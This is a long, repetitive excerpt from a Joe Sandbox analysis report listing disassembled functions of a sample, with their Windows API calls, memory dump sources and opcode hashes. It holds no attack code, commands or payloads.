                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                • Opcode ID: 8a76d5ee9e3d5e9196a6d824849728d7cbba9e1d5d0f26e00177ed3ba3344c24
                                                                                                                                                                                                                                                                • Instruction ID: 281c8f69577812f84ab9f305790b45690c5f18bc599953b359e3d83e07ce8456
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a76d5ee9e3d5e9196a6d824849728d7cbba9e1d5d0f26e00177ed3ba3344c24
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41413B75A00205EBDF05EF98DD85AAAB7B8FF44310F1441A9EA009F296DB30DE51DBA0
                                                                                                                                                                                                                                                                Function 00AB8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00A7FBEF,00000000,?,?,00000000,?,00A639E2,00000004,00000000,00000000), ref: 00AB8CA7
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00AB8CCD
                                                                                                                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00AB8D2C
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00AB8D40
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00AB8D66
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00AB8D8A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 642888154-0
                                                                                                                                                                                                                                                                • Opcode ID: 7aefbeff675f5f5f8b04834687359a97c2aeb2a62d276dc1e23bfac608ac7f5b
                                                                                                                                                                                                                                                                • Instruction ID: 06ad837b469042e1af0da3746e27b546f882214eb5d43b811fab3b6ac8d0aef3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7aefbeff675f5f5f8b04834687359a97c2aeb2a62d276dc1e23bfac608ac7f5b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5341B974601244AFDB25DF68C8C5BE57FF9FB46304F1441A9E5084B2B3CB796856CB50
                                                                                                                                                                                                                                                                Function 00AA2D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,00000000), ref: 00AA2D45
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9EF33: GetWindowRect.USER32(?,?), ref: 00A9EF4B
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00AA2D6F
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AA2D76
                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00AA2DB2
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00AA2DDE
                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AA2E3C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                • Opcode ID: 6a7106217f26cfb35990356c67019ded09a1bc1acf993d8c1d91d49cbe1793fb
                                                                                                                                                                                                                                                                • Instruction ID: 1dc7e81d292a6b9393fd12b988bdcc99dd0333c4de5a5dbea8455179e7bd433f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a7106217f26cfb35990356c67019ded09a1bc1acf993d8c1d91d49cbe1793fb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D31D072505316AFC720DF58C845F9BB7A9FBC5354F000A1AF48597192EB30E919CBE2
                                                                                                                                                                                                                                                                Function 00A855E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00A855F9
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A85616
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A8564E
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8566C
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A85674
                                                                                                                                                                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00A8567E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 72514467-0
                                                                                                                                                                                                                                                                • Opcode ID: 9fad01b7b2ed1dd82106bf855d83bef806a82d876fd60d9da86c12bb7b5e4ea0
                                                                                                                                                                                                                                                                • Instruction ID: fa9b26df69681281d3a22e56d007382f02685848a0ceef106f6344612de6ff67
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9fad01b7b2ed1dd82106bf855d83bef806a82d876fd60d9da86c12bb7b5e4ea0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC212632A046007BEB16AB799C49E7BBBA8DF84720F184179FD05CA0A1FF75CC419760
                                                                                                                                                                                                                                                                Function 00A96263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A255D1,?,?,00A64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A25871
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A962C0
                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00A963DA
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00AC0CC4,00000000,00000001,00AC0B34,?), ref: 00A963F3
                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00A96411
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                                                                • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                • Opcode ID: 9a03d81ae0c79114641da874521024345013ad2b10359583fd84ffeabfd9bf07
                                                                                                                                                                                                                                                                • Instruction ID: fa45ead50103d958485c0dbdef4c5e0527628b750e502be29b9856983265fe63
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a03d81ae0c79114641da874521024345013ad2b10359583fd84ffeabfd9bf07
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FD14275A042119FCB14DF28C680A2ABBF5FF89714F15896DF8899B361CB31EC45CB92
                                                                                                                                                                                                                                                                Function 00AB86FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB8740
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00AB8765
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AB877D
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00AB87A6
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A9C1F2,00000000), ref: 00AB87C6
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00AB87B1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                • Opcode ID: f9cc4ceb2082d88dbbd90166a0a45c4fd2cbce6e5bc1f8ed7a9a45626853cc95
                                                                                                                                                                                                                                                                • Instruction ID: 317e08b77c60c0ac060d1473ab2e9141789e607a19b80d63e43a590a5350f9a8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9cc4ceb2082d88dbbd90166a0a45c4fd2cbce6e5bc1f8ed7a9a45626853cc95
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB2197715102459FCB249F7CCC44BAA7BADEB45369F244729F926C31F1EE348891CB50
                                                                                                                                                                                                                                                                Function 00A436F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00A436E9,00A43355), ref: 00A43700
                                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A4370E
                                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A43727
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00A436E9,00A43355), ref: 00A43779
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                • Opcode ID: 6a87a96371c46f95e665e06e8454055c892c1e3381eefd3da9eff3a4ca5d61cd
                                                                                                                                                                                                                                                                • Instruction ID: 9183012682f7c2e2ae25d1b85a6b17d3f713a23a431c718487f4f86e0d0a2e41
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a87a96371c46f95e665e06e8454055c892c1e3381eefd3da9eff3a4ca5d61cd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A014CBF54E3116EAE24A7F8BDC66672A94EB857717240339F150481F3EF124E039240
                                                                                                                                                                                                                                                                Function 00A530E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00A44D53,00000000,?,?,00A468E2,?,?,00000000), ref: 00A530EB
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5311E
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53146
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000), ref: 00A53153
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000), ref: 00A5315F
                                                                                                                                                                                                                                                                • _abort.LIBCMT ref: 00A53165
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                • Opcode ID: 4d6a9cb2583aa019edfa2155e2d6a5d75592a07bba43946b182026d03c635491
                                                                                                                                                                                                                                                                • Instruction ID: 4a633991d4ee18c6a053484d3eae88b75b31bf2e347a27c4d06d402a05de028c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d6a9cb2583aa019edfa2155e2d6a5d75592a07bba43946b182026d03c635491
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF0F93750090027CE216775BD06B5A1265BFD17B3B240718FD14D61D3FF308A0F4261
                                                                                                                                                                                                                                                                Function 00AB9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A21F87
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: SelectObject.GDI32(?,00000000), ref: 00A21F96
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: BeginPath.GDI32(?), ref: 00A21FAD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: SelectObject.GDI32(?,00000000), ref: 00A21FD6
                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00AB94AA
                                                                                                                                                                                                                                                                • LineTo.GDI32(?,00000003,00000000), ref: 00AB94BE
                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00AB94CC
                                                                                                                                                                                                                                                                • LineTo.GDI32(?,00000000,00000003), ref: 00AB94DC
                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 00AB94EC
                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 00AB94FC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 43455801-0
                                                                                                                                                                                                                                                                • Opcode ID: 198ad69813d04f4c7ad75dae5650f4058580154d34d08798246305965289a4a7
                                                                                                                                                                                                                                                                • Instruction ID: 58194edcde458822711943bafbb6edbabd4e749a14b895ddb7e88da433c2e04d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 198ad69813d04f4c7ad75dae5650f4058580154d34d08798246305965289a4a7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8911097600010DBFDB129F94EC88FAA7F6DEB08360F048121BA1A4A172D7719D56DBA0
                                                                                                                                                                                                                                                                Function 00A85B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00A85B7C
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A85B8D
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A85B94
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00A85B9C
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A85BB3
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00A85BC5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                • Opcode ID: 3a7c5fc9a714713d11be50577199e781e787a318579849af43109aa6937e073a
                                                                                                                                                                                                                                                                • Instruction ID: 6d01161f3bc796123337e38b39bd0d5a77bedd3ea373656ea8f2c68515a6d960
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a7c5fc9a714713d11be50577199e781e787a318579849af43109aa6937e073a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4014F75E00719BBEB10AFF99C49E4EBFB8EB49751F004165FA09A7291E6709C01CFA0
                                                                                                                                                                                                                                                                Function 00A2327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A232AF
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A232B7
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A232C2
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A232CD
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A232D5
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A232DD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Virtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                • Opcode ID: 34fce5f5346c398cc8f0fb101a6a63661e2601e8619aab0ff4b307ab1e1a695a
                                                                                                                                                                                                                                                                • Instruction ID: fcc949ffb49ca874df1dfa0dcc385e47b416140b99ca54b2c46c02b4e313e5ed
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34fce5f5346c398cc8f0fb101a6a63661e2601e8619aab0ff4b307ab1e1a695a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                                                                                                Function 00A8F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A8F447
                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A8F45D
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00A8F46C
